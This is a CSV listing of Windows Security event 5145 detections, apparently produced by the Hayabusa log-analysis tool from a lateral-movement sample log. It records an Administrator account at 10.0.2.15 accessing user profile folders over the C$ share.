2019-03-18 23:23:23.356 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: BGinfo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.546 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\account$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admin01\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Contacts : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Administrator\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
